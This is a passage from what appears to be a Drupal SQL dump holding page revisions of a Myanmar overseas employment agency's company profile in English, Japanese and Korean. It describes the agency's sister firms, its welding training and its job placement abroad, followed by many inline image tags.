data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 248, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 248, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。<o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 248, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.<o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 263, 'en', 0, '<p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\"><img data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4.jpg\"><img data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\"><img data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\"><img data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\"><img data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9.jpg\" alt=\"\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" 